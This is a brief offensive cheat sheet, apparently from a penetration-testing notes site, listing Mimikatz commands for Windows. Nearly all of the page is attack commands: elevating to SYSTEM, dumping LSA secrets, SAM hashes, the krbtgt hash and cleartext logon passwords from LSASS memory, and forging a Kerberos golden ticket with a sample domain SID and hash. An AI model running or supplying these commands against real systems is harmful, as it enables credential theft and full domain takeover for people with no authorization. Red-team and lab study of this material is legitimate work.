Exploit Notes

Mimikatz

Last modified: 2022-11-20

Privilege Escalation Windows

Mimikatz is a password dumping tool for Windows. It also manages Kerberos tickets. Kiwi is the updated version of Mimikatz.

You can download it from the GitHub repository.

Usage

mimikatz

  • Check if Mimikatz Running as an Administrator

    mimikatz # privilege::debug

  • Elevate to SYSTEM Level

    mimikatz # token::elevate

  • Dump Hashes

    mimikatz # lsadump::lsa /patch

    • Security Identifier of the Kerberos Ticket Granting Ticket Account

      mimikatz # lsadump::lsa /inject /name:krbtgt

    • All SAM Local Password Hashes

      mimikatz # lsadump::sam

    • Credentials from the LSASS Memory

      mimikatz # sekurlsa::logonpasswords

  • Create a Kerberos Golden Ticket

    mimikatz # kerberos::golden /user:Administrator /domain:sample.domain /sid
:S-1-5-21-849420856-2351964222-986696166 /krbtgt:7808900312cc005cf7082a9a89eb
dfdf /id:500

  1. Open a New Command Prompt

    mimikatz # misc::cmd